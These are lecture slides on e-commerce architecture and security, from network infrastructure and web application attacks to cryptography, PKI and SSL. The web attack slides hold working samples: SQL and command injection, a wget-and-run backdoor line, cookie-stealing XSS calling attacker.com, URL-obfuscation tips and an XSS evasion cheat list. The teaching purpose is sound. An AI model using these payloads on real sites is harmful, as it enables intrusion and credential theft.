EC Architectural Framework and EC Security

Download Report

Transcript EC Architectural Framework and EC Security

EC Architectural Framework
and EC Security
Lecture 7
Supakorn Kungpisdan
Outline
• EC Architectural Framework
• EC Security
–
–
–
–
–
–
–
–
Basic Security Issues
Security Incidences
Attacking Web Applications
Access Controls
Securing EC Communications
Securing EC Networks
Operations Security
Law, Investigation, and Ethics
ITEC5611
S. Kungpisdan
2
EC Framework
Legal and Public Policy Framework
Public key, Identification and
Authentication Infrastructure
Business Service Infrastructure
Directories, Search Engines etc
Secure Payment Protocols
Online Payment Infrastructure
Security and Encryption Technology
Networked Multimedia content
publishing technologies( HTML,XML,
JAVA,Graphics, Video tools etc.)
Information Distribution & Messaging
Technologies ( HTTP,SMTP, etc.)
E-commerce Applications
Catalog based retail, Marketing & Advert., Banking&
Investments, Supply Chain Management, Auctions,
Home shopping, procurements
Network Protocol Standards
Network Infrastructure (Internet)
ITEC5611
S. Kungpisdan
3
Network Infrastructure
• The Internet Superhighway is responsible for seamless,
reliable transportation on Information among host
devices.
• Local Area Networks, IEEE 802.3 Standards and
Ethernet
• Wide Area Networks
• The Seamless Interface is offered through
– Internet and TCP/IP Model
– IP Addressing and Domain Naming System
– Internet Industry Structure
ITEC5611
S. Kungpisdan
4
Information Distribution Technologies
• Standard Protocols for Information
Distribution on Internet
– File Transfer Protocol (FTP)
– Simple Mail Transfer Protocol (SMTP)
– Hyper Text Transfer Protocol (HTTP)
– Web Server Implementations
• Apache Web Server
• Microsoft’s IIS
ITEC5611
S. Kungpisdan
5
Multimedia Publishing Technologies
• Information Publishing and Web Browsers
– Hyper Text Markup Language (HTML)
– Forms and Common Gateway Interface
– Active Server Pages (ASP)
– Dynamic HTML
– HTML Editors
– XML
• Multimedia Content
– Graphics and Image Formats
– Web Image Formats
– Other Multimedia objects
• VRML (Virtual Reality Markup Language)
ITEC5611
S. Kungpisdan
6
Security and Encryption
• Importance of security for Electronic Commerce and
Inherent vulnerability of Internet
• Protecting the Web (HTTP) Service
• The Issues in Transaction Security
–
–
–
–
–
Cryptography and Cryptanalysis
Symmetric key cryptographic Algorithms
Public-key Algorithms
Authentication protocols
Integrity and Non-repudiation
• Digital Certificates and Signatures
• Electronic Mail Security
– PGP, S/MIME
• Security protocols for E-commerce
– SSL, TLS
ITEC5611
S. Kungpisdan
7
Payment Services
• Payment Systems
• Characteristics of Online Payment Systems
– Pre-Paid Electronic Payment Systems
– Instant-paid Electronic Payment Systems
– Post-Paid Electronic Payment Systems
• Some Electronic Payment Systems
– Secure Electronic Transaction (SET) for Credit Cards
– E-cash
– NetCheque
ITEC5611
S. Kungpisdan
8
Business Service Infrastructure
•
•
•
•
•
Searching and Locating Information on Web Space
Information Directories
Search Engines
Improving the search results
Internet Advertising
ITEC5611
S. Kungpisdan
9
Public Policy and Legal Infrastructure
•
•
•
•
•
Universal Access to Network Infrastructure
Model Law for Electronic Commerce
Taxation Issues in Electronic Commerce
Need for Public Key Infrastructure (PKI)
Digital Certificates and Digital Signatures
ITEC5611
S. Kungpisdan
10
Outline
• EC Architectural Framework
• EC Security
–
–
–
–
–
–
–
–
Basic Security Issues
Security Incidences
Attacking Web Applications
Access Controls
Securing EC Communications
Securing EC Networks
Operations Security
Law, Investigation, and Ethics
ITEC5611
S. Kungpisdan
11
Basic Security Issues
• From the user’s perspective:
– Is Web server owned and operated by a legitimate
company?
– Does Web page and form contain any malicious or
dangerous code or content?
– Will the owner of the Web site will not distribute the
information the user provides to some other party?
ITEC5611
S. Kungpisdan
12
Basic Security Issues (cont.)
•
From the company’s perspective:
– How does the company know the user will not
attempt to break into the Web server or alter the
pages and content at the site?
– How does the company know that the user will not
try to disrupt the server so that it is not available to
others?
ITEC5611
S. Kungpisdan
13
Basic Security Issues (cont.)
•
From both parties’ perspectives:
– How do both parties know that the network
connection is free from eavesdropping by a third
party “listening” on the line?
– How do they know that the information sent backand-forth between the server and the user’s
browser has not been altered?
ITEC5611
S. Kungpisdan
14
Goals of Computer Security (CIA)
• Confidentiality
– Ensure that the message is accessible only by authorized
parties
• Integrity
– Ensure that the message is not altered during the
transmission
• Availability
– Ensure that the information on the system is available for
authorized parties at appropriate times
ITEC5611
S. Kungpisdan
15
Basic Security Issues
•
•
•
•
•
•
•
Authentication
Authorization
Auditing
Confidentiality (Privacy)
Integrity
Availability
Non-repudiation
ITEC5611
S. Kungpisdan
16
Security Trends
ITEC5611
S. Kungpisdan
17
Vulnerabilities, Threats, and Attacks
• Vulnerability
– A weakness in the security system
– E.g. a program flaw, poor security configuration, bad
password policy
• Threat
– A set of circumstances or people that potentially causes
loss or harm to a system
• Attack
– An action or series of actions to harm a system
ITEC5611
S. Kungpisdan
18
Relationships among different Security Components
ITEC5611
S. Kungpisdan
19
Relationship of Threats and Vulnerabilities
ITEC5611
S. Kungpisdan
20
How Hackers Exploit Weaknesses
ITEC5611
S. Kungpisdan
21
General Security Issues at EC Sites
ITEC5611
S. Kungpisdan
22
Outline
• EC Architectural Framework
• EC Security
–
–
–
–
–
–
–
–
Basic Security Issues
Security Incidences
Attacking Web Applications
Access Controls
Securing EC Communications
Securing EC Networks
Operations Security
Law, Investigation, and Ethics
ITEC5611
S. Kungpisdan
23
Types of Security Incidences
ITEC5611
S. Kungpisdan
24
Hackers
•
•
•
•
•
White Hat Hackers
Grey Hat Hackers
Script Kiddies
Hacktivists
Crackers or Black Hat Hackers
ITEC5611
S. Kungpisdan
25
Hackers’ Steps
1.
2.
3.
4.
5.
6.
Gather information
 Telephone conversation, password crackers
Gain initial system access
 Often limited access and rights
Increase privileges and expand access
 Try to get root privilege
Carry out purpose of the attack
 Steal or destroy information
Install backdoors
 Build entrance for the next visit
Cover tracks and exit
 Remove all traces. Usually modifying log files
ITEC5611
S. Kungpisdan
26
Malicious Codes
• Viruses
– A destructive program code that attaches itself to a host
and copies itself and spreads to other hosts
– Viruses replicates and remains undetected until being
activated.
• Worms
– Unlike viruses, worms is independent of other programs or
files. No trigger is needed.
• Trojans
– Externally harmless program but contains malicious code
• Spyware
– Software installed on a target machine sending information
back to an owning server
ITEC5611
S. Kungpisdan
27
Security Incidences
•
•
•
Probe
– A probe is characterized by unusual attempts to gain access to a
system or to discover information about the system.
– Sometimes followed by a more serious security event, but they are
often the result of curiosity or confusion.
Scan
– A large number of probes done using an automated tool.
– Often a prelude to a more directed attack on systems whose security
can be breached.
Account Compromise
– Unauthorized use of a computer account by someone other than the
account owner, without involving system-level or root-level privileges. It
might expose the victim to serious data loss, data theft, or theft of
services.
– The lack of root-level access means that the damage can usually be
contained, but a user-level account opens up avenues for greater
access to the system.
ITEC5611
S. Kungpisdan
28
Security Incidences (cont’d)
• Root Compromise
– Similar to an account compromise, except that the
account that has been compromised has special
privileges on the system.
• Packet Sniffer
– A program that captures data from information packets
as they travel over the network.
ITEC5611
S. Kungpisdan
29
Security Incidences (cont’d)
denial-of-service (DoS) attack
An attack on a Web site in which an attacker uses
specialized software to send a flood of data
packets to the target computer with the aim of
overloading its resources
distributed denial-of-service (DDoS) attack
A denial-of-service attack in which the attacker
gains illegal administrative access to as many
computers on the Internet as possible and uses
the multiple computers to send a flood of data
packets to the target computer
ITEC5611
S. Kungpisdan
30
Using Zombies in a Distributed DoS Attack
ITEC5611
S. Kungpisdan
31
Outline
• EC Architectural Framework
• EC Security
–
–
–
–
–
–
–
–
Basic Security Issues
Security Incidences
Attacking Web Applications
Access Controls
Securing EC Communications
Securing EC Networks
Operations Security
Law, Investigation, and Ethics
ITEC5611
S. Kungpisdan
32
Attacking Web Applications
• The majority of vulnerabilities are caused by a lack of
proper input validation by the application before
processing user-supplied data
• This can allow attackers to disclose information about
the site, steal information from backend DBs, or execute
binary code on the web server
ITEC5611
S. Kungpisdan
33
SQL Injection
• Many web applications rely on backend DBs for
information storage and retrieval.
• Sometimes a script will perform a DB query using input
supplied from a web page, without verifying that the
input does not contain any escape characters
• Consider the following:
• Query = “SELECT * FROM users WHERE username =
‘{$_POST[‘user’]}’ AND password = ‘{$_POST[‘pass’]}’ ”;
• “SELECT * FROM users WHERE username = ‘bob’ AND password
= ‘ ’ OR 1=1 ”;
ITEC5611
S. Kungpisdan
34
Code Injection
• Sometimes user-supplied strings are not properly
checked for escape characters before being passed to
commands as arguments
• Consider a PHP script that takes a string supplied from
web page form and passes it to the nslookup utility
ITEC5611
S. Kungpisdan
35
Code Injection (cont.)
• If supply ;ls –la/, the script will execute the command
nslookup;ls –la/, resulting in a listing of the root
directory being printed out
ITEC5611
S. Kungpisdan
36
Code Injection (cont.)
• wget and perl commands could be used to download
and run a backdoor on the web server by supplying the
following line to the script
• ;wget http://attackersite/backdoor.pl;perl
backdoor.pl
ITEC5611
S. Kungpisdan
37
Cross-Site Scripting (XSS)
• XSS vulnerabilities allow attackers to inject code or HTML into
a web page that will be executed when a different user visits
that page
• These attacks target visitors to a web site, not the site itself,
and occur when a web page does not properly sanitize user
input before using it in output
• As a matter of fact in vulnerable websites is possible to
execute HTML and JavaScript codes from a not sanitized
form, which combined can be really dangerous: it's possible
to steal cookies or to redirect web pages to build fake login in
order to steal login usernames and passwords.
ITEC5611
S. Kungpisdan
38
Types of XSS
• The term XSS is actually a bit elusive because it
includes different kinds of attacks that stands each other
on different attacking mechanisms.
• There are actually three types of Cross-Site Scripting,
commonly named as:
– DOM-Based XSS
– Non-persistent XSS
– Persistent XSS
Ref: http://www.milw0rm.com/papers/146
http://en.wikipedia.org/wiki/Cross_Site_Scripting
ITEC5611
S. Kungpisdan
39
DOM-based XSS
• DOM-based or Type 0 XSS vulnerability, also referred
to as local XSS, is based on the standard object model
for representing HTML or XML called the Document
Object Model or DOM for short.
• The DOM-Based XSS allows to an attacker to work not
on a victim website but on a victim local machine
ITEC5611
S. Kungpisdan
40
DOM-based XSS (cont.)
1.
2.
3.
4.
The attacker creates a well-built malicious website
The ingenuous user opens that site
The user has a vulnerable page on his machine
The attacker's website sends commands to the
vulnerable HTML page
5. The vulnerable local page execute that commands with
the user's privileges on that machine
6. The attacker easily gain control on the victim computer.
ITEC5611
S. Kungpisdan
41
Exploit Scenario
1. Mallory sends the URL of a maliciously constructed web
page to Alice, using email or another mechanism.
2. Alice clicks on the link.
3. The malicious web page's JavaScript opens a
vulnerable HTML page installed locally on Alice's
computer.
4. The vulnerable HTML page contains JavaScript which
executes in Alice's computer's local zone.
5. Mallory's malicious script now may run commands with
the privileges Alice holds on her own computer.
ITEC5611
S. Kungpisdan
42
DOM-based XSS (cont.)
• DOM-based XSS is really dangerous because it
operates on the victim system strictly and as long as the
user doesn't look after his/her security issues and
doesn't apply updates, the DOM-Based XSS will work
fine.
• Solution: To prevent this kind of attacks there are only
two things to take care of:
– Do not visit untrusted website
– Keep your system up to date
ITEC5611
S. Kungpisdan
43
Non-persistent XSS
• The non-persistent or Type 1 XSS is also referred to as
a reflected vulnerability, and is by far the most common
type.
• It's commonly named as "non-persistent" because it
works on an immediate HTTP response from the victim
website
• It shows up when data provided by a web client is used
immediately by server-side scripts to generate a page of
results for that user.
• If unvalidated user-supplied data is included in the
resulting page without HTML encoding, this will allow
client-side code to be injected into the dynamic page
ITEC5611
S. Kungpisdan
44
Non-persistent XSS: Search Engine
• Attacker writes some arbitrary HTML code in the
search textbox and, if the website is vulnerable,
the result page will return the result of these
HTML entities.
• If this happens at 99% the Search engine will
execute also JavaScript arbitrary code.
ITEC5611
S. Kungpisdan
45
Example
1. Assure that a website works like this:
http://www.example.com/search.php?text=TEXTTOSEARCH
2. Try to include some HTML tags in the "text" variable:
http://www.example.com/search.php?text=<img
src="http://attacker.com/image.jpg">
If the website is vulnerable it will display the attacker's
image into the result webpage.
ITEC5611
S. Kungpisdan
46
Example (cont.)
3. Try then to write some JavaScript code:
http:///www.example.com/search.php?text=<script>alert(d
ocument.cookie)</script>
Probably the website will return an alert popup with the
current Cookie for the site itself.
ITEC5611
S. Kungpisdan
47
Example (cont.)
• This vulnerability can be used by the attacker to steal
information to users of the victim website providing them
for example an email with an URL like:
http://www.victim.com/search.php?text=MALICIOUSCODE
• To make that URL less suspicious it will be useful to
encode the code in URL Hex value
For example the code: <script>alert("XSS")</script>
Encoded will look like:
%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%22%58%53%53%2
2%29%3B%3C %2F%73%63%72%69%70%74%3E
ITEC5611
S. Kungpisdan
48
Example (cont.)
• And as comes the malicious url will turn from:
http://www.victim.com/search.php?text=<script>aler
t("XSS")</script>
Into:
http://www.victim.com/search.php?text=%3C%73%63%72
%69%70%74%3E%61%6C%65%72%74%28%22
%58%53%53%22%29%3B%3C%2F%73%63%72%69%70%74%3E
Which, for a clueless user, it's lot less suspicious than
the first one.
ITEC5611
S. Kungpisdan
49
Example (cont.)
1. The attacker realizes that the victim website is vulnerable to XSS
2. The attacker creates on his website an ad-hoc page which is used
to steal sensible information, e.g. Cookies, or to make a fake login
of the victim website.
3. The attacker provides to a user a crafted URL containing a
malicious code like:
http://www.victim.com/search.php?text=
<script>document.location("http://attackersite.com/fake
login.php")</script>
Encoded in Hex.
4. The user visits the web page and is obscurely redirect the
attacker's fakelogin
5. The user is invited to log into the system and he does.
6. The fake login steals the username and password of the victim.
ITEC5611
S. Kungpisdan
50
Exploit Scenario
1. Alice often visits a particular website, which is hosted by
Bob. Bob's website allows Alice to log in with a
username/password pair and store sensitive
information, such as billing information.
2. Mallory observes that Bob's website contains a
reflected XSS vulnerability.
3. Mallory crafts a URL to exploit the vulnerability, and
sends Alice an email, making it look as if it came from
Bob (i.e., the email is spoofed).
4. Alice visits the URL provided by Mallory while logged
into Bob's website.
ITEC5611
S. Kungpisdan
51
Exploit Scenario (cont.)
5. The malicious script embedded in the URL executes in
Alice's browser, as if it came directly from Bob's server.
The script can be used to email Alice's session cookie
to Mallory. Mallory can then use the session cookie to
steal sensitive information available to Alice
(authentication credentials, billing info, etc) without
Alice's knowledge.
ITEC5611
S. Kungpisdan
52
Interesting Example
• http://www.yannarak.net/node/2
ITEC5611
S. Kungpisdan
53
Persistent XSS
• The persistent XSS is similar to non-persistent XSS
– Both works on a victim site and tries to hack user information
• However, attacker doesn't need to provide the crafted
URL to the users
• Because the website itself permits to users to insert fixed
data into the system
– This is the case for example of "guestbooks"
• Usually the users use that kind of tool to leave
messages to the owner of the website
• An attacker can insert some malicious code in his
message and let ALL visitors to be victim of that.
ITEC5611
S. Kungpisdan
54
Exploit Scenario
1. Bob hosts a web site allowing users to post messages
and other content to the site for later viewing by other
members.
2. Mallory notices that Bob's website is vulnerable to a
type 2 XSS attack.
3. Mallory posts a message, controversial in nature, which
may encourage many other users of the site to view it.
4. Upon merely viewing the posted message, site users'
session cookies or other credentials could be taken and
sent to Mallory's web server without their knowledge.
5. Later, Mallory logs in as other site users and posts
messages on their behalf....
ITEC5611
S. Kungpisdan
55
Exploit Scenario (cont.)
• This works when the tool provided (the guestbook in the
example) doesn't do any check on the content of the
inserted message: it just inserts the data provided from
the user into the result page.
• The attacker could easily insert as much code as he
wants into the tool, for example:
<img src="javascript:document.location
('http://attacker.com/steal.php?cookie=' .
encodeURI(document.cookie));">
This allows the attacker to steal the cookie of the victim
user.
ITEC5611
S. Kungpisdan
56
More about XSS
• In order to make the attack less suspicious it's possible
to "obfuscate" the IP address of the attacker's website,
encoding the IP address with three formats:
– Dword Address
– Hex Address
– Octal Address
• For example the IP address 127.0.0.1 will look like:
– Dword: 2130706433
– Hex: 0x7f.0x00.0x00.0x01
– Octal: 0177.0000.0000.0001
• Try for example: http://0x7f.0x00.0x00.0x01/
and it will open your localhost web server.
ITEC5611
S. Kungpisdan
57
Possible XSS Cheats
•
•
•
•
•
•
•
•
•
•
•
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
<IMG
SRC=&#x22;&#x6A;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x7
0;&#x74;
&#x3A;&#x61;&#x6C;&#x65;&#x72;&#x74;&#x28;&#x27;&#x50;&#x4C;&#
x41;&#x59;&#x48;
&#x41;&#x43;&#x4B;&#x2E;&#x4E;&#x45;&#x54;&#x27;&#x29;&#x22;>
<IMG SRC="javascript:alert(String.fromCharCode(88,83,83))">
<SCRIPT/XSS SRC="http://example.com/xss.js"></SCRIPT>
<<SCRIPT>alert("XSS");//<</SCRIPT>
<iframe src=http://example.com/scriptlet.html <
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
<BODY BACKGROUND="javascript:alert('XSS')">
<BODY ONLOAD=alert(document.cookie)>
<IMG DYNSRC="javascript:alert('XSS')">
ITEC5611
S. Kungpisdan
58
Possible XSS Cheats (cont.)
• <IMG DYNSRC="javascript:alert('XSS')"> <BR
SIZE="&{alert('XSS')}">
• <IMG SRC='vbscript:msgbox("XSS")'>
• <TABLE BACKGROUND="javascript:alert('XSS')">
• <DIV STYLE="width: expression(alert('XSS'));">
• <DIV STYLE="background-image:
url(&#1;javascript:alert('XSS'))">
• <STYLE TYPE="text/javascript">alert('XSS');</STYLE>
• <STYLE
type="text/css">BODY{background:url("javascript:alert('X
SS')")}</STYLE>
• <?='<SCRIPT>alert("XSS")</SCRIPT>'?>
• <A
HREF="javascript:document.location='http://www.example.c
om/'">XSS</A>
ITEC5611
S. Kungpisdan
59
Information Disclosure
• An error page can discloses the path of thee web
server’s root directory
• The path disclosure can aid attackers performing
reconnaissance on the site
• phpinfo.php, part of a default PHP install, is a script
providing the OS and software version on the host and
other related information
• Google for inurl:phpinfo.php to see exactly how
much information is leaked
ITEC5611
S. Kungpisdan
60
Outline
• EC Architectural Framework
• EC Security
–
–
–
–
–
–
–
–
Basic Security Issues
Security Incidences
Attacking Web Applications
Access Controls
Securing EC Communications
Securing EC Networks
Operations Security
Law, Investigation, and Ethics
ITEC5611
S. Kungpisdan
61
CIA for Access Control
• Confidentiality
– Not disclosed to unauthorized person
• Integrity
– Prevention of modification by unauthorized users
– Prevention of unauthorized changes by otherwise authorized
users
– Internal and External Consistency
– Internal Consistency within the system (i.e. within a database the
sum of subtotals is equal to the sum of all units)
– External Consistency – database with the real world (i.e.
database total is equal to the actual inventory in the warehouse)
• Availability
– Timely access
ITEC5611
S. Kungpisdan
62
Security Controls
Ref: . Harris, CISSP All-in-One Exam Guide, 3rd Edition, McGraw-Hill
ITEC5611
S. Kungpisdan
63
Security Controls (cont.)
Ref: . Harris, CISSP All-in-One Exam Guide, 3rd Edition, McGraw-Hill
ITEC5611
S. Kungpisdan
64
Authentication
• Something you know
– Passwords, pins
• Something you have
– Tokens, smart cards
• Something you are
– biometrics
ITEC5611
S. Kungpisdan
65
Biometrics
biometric systems
Authentication systems that identify a person by
measurement of a biological characteristic, such as
fingerprints, iris (eye) patterns, facial features, or voice
physiological biometrics
Measurements derived directly from different parts of
the body (e.g., fingerprint, iris, hand, facial
characteristics)
behavioral biometrics
Measurements derived from various actions and
indirectly from various body parts (e.g., voice scans or
keystroke monitoring)
ITEC5611
S. Kungpisdan
66
Biometrics (cont.)
•
•
•
•
•
•
•
•
•
Fingerprints
Palm Scans
Hand Geometry
Retina Scans
Iris Scans
Facial Scans
Voice Print
Signature Dynamics
Keyboard Dynamics
ITEC5611
S. Kungpisdan
67
Single Sign-on
• Kerberos
• Allow a user to access many services from only
one authentication
• Symmetric key encryption
– KDC – Kerberos-trusted Key Distribution Center
– AS – Authentication Server
– TGS – Ticket Granting Service
ITEC5611
S. Kungpisdan
68
Kerberos (cont.)
Ref: W. Stallings, Cryptography and Network Security, 4th Edition, Pearson-PrenticeHall
ITEC5611
S. Kungpisdan
69
Intrusion Detection
• Network Based
– Real Time, Passive
– Snort
• Host Based
– System and event logs
– Limited by log capabilities
• Honey Pot
• System Integrity Verifier (SIV)
– Tripwire
ITEC5611
S. Kungpisdan
70
Intrusion Detection (cont.)
• Signature Based – (Knowledge Based)
– Signatures of an attack are stored and referenced
– Failure to recognize slow attacks
– Must have signature stored to identify
• Statistical Anomaly Based (Behavior Based)
– IDS determines “normal” usage profile using statistical samples
– Detects anomaly from the normal profile
ITEC5611
S. Kungpisdan
71
Measures for compensating for both internal
and external access violations
•
•
•
•
•
Backups
RAID – Redundant Array of Inexpensive Disks
Fault Tolerance
Business Continuity Planning
Insurance
ITEC5611
S. Kungpisdan
72
Outline
• EC Architectural Framework
• EC Security
–
–
–
–
–
–
–
–
Basic Security Issues
Security Incidences
Attacking Web Applications
Access Controls
Securing EC Communications
Securing EC Networks
Operations Security
Law, Investigation, and Ethics
ITEC5611
S. Kungpisdan
73
Transaction Security Issues
• Disclosure:
– Release of message contents to any person not authorized to
see them
• Traffic Analysis:
– It refers to the discovery of the pattern of traffic between parties.
• Masquerade:
– It refers to insertion of messages into the network from a
fraudulent source.
• Content modification:
– Changes to the contents of a message, including insertion,
deletion, transposition, or modification.
ITEC5611
S. Kungpisdan
74
Transaction Security Issues (cont.)
• Sequence modification:
– It refers insertion, deletion, and reordering of some sequenced
packets by the intruder during transmission.
• Timing modification:
– It refers to delayed or replay of old message sequences that
were recorded by intruder in an earlier transaction.
• Repudiation:
– It refers to the denial of receipt of message by destination or
denial of transmission of message by source.
ITEC5611
S. Kungpisdan
75
Encryption
The process of scrambling (encrypting) a message
(plaintext) into ciphertext in such a way that it is
difficult, expensive, or time-consuming for an
unauthorized person to unscramble (decrypt) it
plaintext + encryption algorithm + key  ciphertext
ITEC5611
S. Kungpisdan
76
Basic Terminology
•
•
•
•
•
•
•
•
plaintext - original message
ciphertext - coded message
cipher - algorithm for transforming plaintext to ciphertext
key - info used in cipher known only to sender/receiver
encipher (encrypt) - converting plaintext to ciphertext
decipher (decrypt) - recovering ciphertext from plaintext
cryptography - study of encryption principles/methods
cryptanalysis (codebreaking) - study of principles/
methods of deciphering ciphertext without knowing key
• cryptology - field of both cryptography and cryptanalysis
ITEC5611
S. Kungpisdan
77
ITEC5611
S. Kungpisdan
78
Cryptography and Steganography
• Plaintext can be hidden by two ways:
– Steganography: conceal the existence of the
message
– Cryptography: render the message unintelligible to
outsiders using various kinds of transformation of
the text
• Examples of Steganography
– Character marking: overwrite text with pencil
– Invisible ink: use special substance
– Pin punctures: pin puncture on selected letters
ITEC5611
S. Kungpisdan
79
How a Cryptosystem Works
Plaintext (M) (data file or messages)
encryption algorithm (E) +
secret key A (KA)
E(M) = C
D(C) = M
D(E(M)) = M
Ciphertext (C) (stored or transmitted safely)
decryption algorithm (D) +
secret key B (KB)
Plaintext (M) (original data or messages)
Note: Key A may be the same as Key B,
depending on the algorithm
ITEC5611
S. Kungpisdan
80
Brute Force Search
• always possible to simply try every key
• most basic attack, proportional to key size
• assume either know / recognise plaintext
Key Size (bits)
Number of Alternative
Keys
Time required at 1
decryption/µs
Time required at 106
decryptions/µs
32
232 = 4.3  109
231 µs
= 35.8 minutes
2.15 milliseconds
56
256 = 7.2  1016
255 µs
= 1142 years
10.01 hours
128
2128 = 3.4  1038
2127 µs
= 5.4  1024 years
5.4  1018 years
168
2168 = 3.7  1050
2167 µs
= 5.9  1036 years
5.9  1030 years
26! = 4  1026
2  1026 µs = 6.4  1012 years
26 characters
(permutation)
ITEC5611
S. Kungpisdan
6.4  106 years
81
Caesar Cipher
•
•
•
•
•
earliest known substitution cipher
by Julius Caesar
first attested use in military affairs
replaces each letter by 3rd letter on
example:
meet me after the toga party
PHHW PH DIWHU WKH WRJD SDUWB
ITEC5611
S. Kungpisdan
82
Caesar Cipher
K=3
Outer: plaintext
Inner: ciphertext
ITEC5611
S. Kungpisdan
83
Cryptanalysis of Caesar Cipher
• only have 26 possible ciphers
– A maps to A,B,..Z
•
•
•
•
•
could simply try each in turn
a brute force search
given ciphertext, just try all shifts of letters
do need to recognize when have plaintext
eg. break ciphertext "GCUA VQ DTGCM"
ITEC5611
S. Kungpisdan
84
Types of Cryptography
• Symmetric Cryptography
– Deploy the same secret key to encrypt and decrypt
messages
– The secret key is shared between two parties
– Encryption algorithm is the same as decryption
algorithm
• Asymmetric (Public-key) Cryptography
– Private key, Public key
– The secret key is not shared and two parties can
still communicate using their public keys
– Encryption alg. is different from decryption alg.
ITEC5611
S. Kungpisdan
85
Symmetric Cryptography
Ref: W. Stallings, Cryptography and Network Security, 4th Edition, Pearson-PrenticeHall
ITEC5611
S. Kungpisdan
86
Public-Key Cryptography
Ref: W. Stallings, Cryptography and Network Security, 4th Edition, Pearson-PrenticeHall
ITEC5611
S. Kungpisdan
87
Data Encryption Standard (DES)
• Derived in 1972 as derivation of Lucifer algorithm
developed by Horst Fiestel at IBM
• Commercial and non-classified systems
• DES uses 64 bit block size and 56 bit key, begins with
64 bit key and strips 8 parity bits
• DEA is 16 round cryptosystem designed for
implementation in hardware
• 56 bit key = 256 or 70 quadrillion possible keys
• Distributed systems can break it. U.S. Government no
longer uses it
• Triple DES – three encryptions using DEA are now being
used until AES is adopted
ITEC5611
S. Kungpisdan
88
3DES
• Double encryption is subject to meet in the
middle attack
• Encrypt on one end decrypt on the other and
compare the values
• So Triple DES is used
• Can be done several different ways:
– DES – EDE2 (encrypt key 1, decrypt key 2, encrypt
key 1)
– DES – EE2 (encrypt key 1, encrypt key 2, encrypt key
1)
– DES –EE3 (encrypt key 1, encrypt key 2, encrypt key
3) - most secure
ITEC5611
S. Kungpisdan
89
AES
• Advanced Encryption Standard
• Block Cipher that will replace DES
• Anticipated that Triple DES will remain approved for
Government Use
• AES announced by NIST in January 1997 to find
replacement for DES
• October 2, 2000 NIST Selected Rijndael
• 2 Belgian Cryptographers Dr. Daeman and Dr. Rijmen
• Will be used by government for sensitive but unclassified
documents
ITEC5611
S. Kungpisdan
90
RSA
• Rivest, Shamir and Addleman
• Based on difficulty of factoring a number which
is the product of two large prime numbers, may
be 200 digits each.
• Can be used for Encryption, key exchange, and
digital signatures
ITEC5611
S. Kungpisdan
91
Elliptic Curve Cryptography (ECC)
• Elliptic curve discrete logarithm are hard to
compute than general discrete logarithm
• Smaller key size same level of security
• Elliptic curve key of 160 bits = RSA of 1024 bits
• Suited to smart cards and wireless devices (less
memory and processing)
• Digital signatures, encryption and key
management
ITEC5611
S. Kungpisdan
92
Digital Signal Standard (DSS) and Secure
Hash Standard (SHS)
• Enables use of RSA digital signature algorithm
or DSA –Digital Signature Algorithm (based on
El Gamal)
• Both use The Secure Hash Algorithm to
compute message digest then processed by
DSA to verify the signature. Message digest is
used instead of the longer message because
faster.
ITEC5611
S. Kungpisdan
93
MD5 and SHA-1
• MD5 Message Digest version 5
– Developed by Ronald Rivest in 1991
– Produces 128 bit message digest
• SHA-1
– Secure Hash Algorithm produces 160 bit digest if
message is less than 2^64 bits.
– It is computationally infeasible to find message from
message digest
– It is computationally infeasible to find to different
messages with same message digest
– Padding bits are added to message to make it a
multiple of 512
ITEC5611
S. Kungpisdan
94
Digital Signatures
ITEC5611
S. Kungpisdan
95
Public Key Certification Systems
• A source could post a public key under the
name of another individual
• Digital certificates counter this attack, a
certificate can bind individuals to their key
• A Certificate Authority (CA) acts as a notary to
bind the key to the person
• CA must be cross-certified by another CA
ITEC5611
S. Kungpisdan
96
Public Key Infrastructure
•
•
•
•
•
•
•
•
•
•
Digital Certificates
Certificate Authorities (CA)
Registrations Authorities
Policies and procedures
Certificate Revocation
Non-repudiation support
Timestamping
Lightweight Directory Access Protocol
Security Enabled Applications
Cross Certification
ITEC5611
S. Kungpisdan
97
Key Escrow
• Allowing law enforcement to obtain the keys to
view peoples encrypted data
• Escrow the key in two pieces with two trusted
escrow agents
• Court order to get both pieces
• Clipper Chip – implemented in tamper proof
hardware
ITEC5611
S. Kungpisdan
98
Key Management
•
•
•
•
•
•
•
•
Key control
Key recovery
Key storage
Key retirement/destruction
Key Change
Key Generation
Key theft
Frequency of key use
ITEC5611
S. Kungpisdan
99
E-mail Security
•
•
•
•
Non-repudiation
Confidentiality of messages
Authentication of Source
Verification of delivery
ITEC5611
S. Kungpisdan
100
Secure Multipurpose Internet Mail
Extensions (S/MIME)
• Adds secure services to messages in MIME
format
• Provides authentication through digital
signatures
• Follows Public Key Cryptography Standards
(PKCS)
• Uses X.509 Signatures
ITEC5611
S. Kungpisdan
101
Pretty Good Privacy - PGP
•
•
•
•
•
Phil Zimmerman
Symmetric Cipher using IDEA
RSA is used for signatures and key distribution
No CA, uses “web of trust”
Users can certify each other
ITEC5611
S. Kungpisdan
102
Secure Sockets Layer (SSL)
•
•
•
•
•
•
•
•
•
•
Developed by Netscape in 1994
Uses public key to authenticate server to the client
Also provides option client to sever authentication
Supports RSA public Key Algorithms, IDEA, DES, and
3DES
Supports MD5 Hashing
HTTPS header
Resides between the application and TCP layer
Can be used by telnet, FTP, HTTP and e-mail protocols.
Based on X.509
Transaction Layer Security  Successor to SSL
ITEC5611
S. Kungpisdan
103
Outline
• EC Architectural Framework
• EC Security
–
–
–
–
–
–
–
–
Basic Security Issues
Security Incidences
Attacking Web Applications
Access Controls
Securing EC Communications
Securing EC Networks
Operations Security
Law, Investigation, and Ethics
ITEC5611
S. Kungpisdan
104
OSI Security Services
• A security service is a collection of security
mechanisms, files, and procedures that help
protect the network.
–
–
–
–
–
–
Authentication
Access control
Data confidentiality
Data integrity
Non-repudiation
Logging and monitoring
ITEC5611
S. Kungpisdan
105
OSI Security Mechanisms
• A security mechanism is a control that is
implemented in order to provide the 6 basic
security services.
–
–
–
–
–
–
–
–
Encipherment (encryption and decryption)
Digital signature
Access Control
Data Integrity
Authentication
Traffic Padding
Routing Control
Notarization
ITEC5611
S. Kungpisdan
106
Application Layer Security
• SET – Secure Electronic Transaction
– Originated by Visa and MasterCard
– Being overtaken by SSL
• HTTPS - Secure HTTP
– Early standard for encrypting HTTP messages
– Also being overtaken by SSL
• S/MIME – Secure Multi-purposed Internet Mail
Extension
– Email encryption and digital signature
ITEC5611
S. Kungpisdan
107
Transport Layer Security
